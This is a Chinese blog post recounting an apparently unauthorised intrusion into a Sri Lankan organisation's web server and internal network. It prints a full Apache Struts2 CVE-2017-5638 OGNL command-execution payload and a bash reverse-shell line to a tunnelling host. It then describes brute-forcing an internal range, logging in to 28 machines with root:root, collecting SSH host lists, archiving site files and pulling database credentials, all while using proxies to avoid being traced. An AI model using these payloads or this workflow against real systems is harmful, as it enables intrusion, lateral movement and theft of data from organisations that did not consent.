记一次丝滑的渗透测试

admin 2024年9月28日09:44:19评论22 views字数 2270阅读7分34秒阅读模式

注意:本文章仅用于技术交流学习,请勿用于非法用途,否则后果自负

本次测试的是一个斯里兰卡的站点,相关内容均厚码处理

记一次丝滑的渗透测试

fofa返回的结果是只有四个资产且全部都是一个域名下的

这是一个后台,但酷酷习题大法在这里已经没用了,由于站点比较冷门,筛不到这个站点,只能一边用漏扫一边手动测。

由于它是后台,我首先想到了sql注入,直接抓到请求包然后扔sqlmap

根据其前台的功能点,又找到一处与数据库交互的地方:

记一次丝滑的渗透测试

分别用sqlmap跑这两个post包后,均失败

记一次丝滑的渗透测试

此时再查看漏扫:

记一次丝滑的渗透测试

CVE-2023-48795,是ssh前缀截断攻击,其原理为:攻击者可以在初始密钥交换期间注入任意数量的SSH消息,并在交换完成后移除相同数量的消息,从而破坏SSH扩展协商(RFC8308),可降级连接的安全性。但是,它的利用条件比较苛刻,需要从本地网络发起,这点我们是做不到的。

记一次丝滑的渗透测试

CVE-2017-5638,这是一个RCE(没想到24年扫到了17年的老洞),这个单位的运维也是上大分了,这个利用很简单,只需要改请求包中Content-Type的值即可实现rce

poc:

Content-Type:  %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

那么直接发请求包:

记一次丝滑的渗透测试

也是成功利用了。

先看看它可以通过什么方式反弹shell

whereis nc bash python php exec lua perl ruby

记一次丝滑的渗透测试

尝试通过nc反弹shell(由于担心攻击机被溯源,我开代理+内网穿透):

记一次丝滑的渗透测试

记一次丝滑的渗透测试

不知道为什么连不上,再试试bash反弹:

bash -i >& /dev/tcp/16.tcp.cpolar.top/14898 0>&1

记一次丝滑的渗透测试

这次成功了

回头看cve-2023-48795,它攻击面较小,条件也是苛刻中的苛刻,这里我附上相关文章,各位感兴趣的观众可以去看看

https://blog.csdn.net/Xxy605/article/details/135199758

这里我想看看它都开着什么端口,本能地输入了一个nmap,没想到还真有(运维上大分)

因为可以出网啥的,我就直接塞了个fscan进去,然后开始扫端口,ip

记一次丝滑的渗透测试

开了个zabbix

扫了一顿啥也没有,一看版权信息是2019的,搜一下历史洞

搜到了cve-2022-23131,cve-2024-22116,不过这些漏洞均无法利用。

这里尝试./fscan -h 172.20.1.1/16 -c id -t 100000来爆破一下内网机器

扫了一顿发现172.20段有且只有172.20.252.1存在弱口令(root:root),然后history看到前面的几条命令有很多ssh连接记录(记录均为内网),果断翻找ssh凭据,同时fscan扫描整个172段

记一次丝滑的渗透测试

像这样的ip出来了28个

记一次丝滑的渗透测试

测试了一下也都可以登上去,只能说逆天

记一次丝滑的渗透测试

也可以出网

此时我黄豆就开始幻想了,幻想自己是比肩年姐那样的顶尖红队大玉,可以手撕内网

为了拓宽攻击面,我 cat ~/.ssh/known_hosts

记一次丝滑的渗透测试

只有可怜的五台(172.20.252.2还登不上去)

然后再来看3389(windows上的内网渗透容易于linux)

记一次丝滑的渗透测试

未果

那现在只能先脱网站文件,审计来扩大攻击面了(又特么回到起点了)

tar -cvf 114514.tar *

一边脱着,我就想看看他装了什么软件,直接yum list,然后给我报了个这个玩意:

记一次丝滑的渗透测试

没想到还有个邮服,属于是意外之喜了

目前收获:内网机器*28,邮服*1

然后审到了数据库账号密码,想进一步看看数据库,没想到这羁绊系统,虽然有17年的陈年nday但是还有蓝队值守,给我光速拔线了

记一次丝滑的渗透测试

记一次丝滑的渗透测试

屋檐了。

原文始发于微信公众号(黄豆安全实验室):记一次丝滑的渗透测试

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月28日09:44:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次丝滑的渗透测试https://cn-sec.com/archives/3216614.html

发表评论

匿名网友 填写信息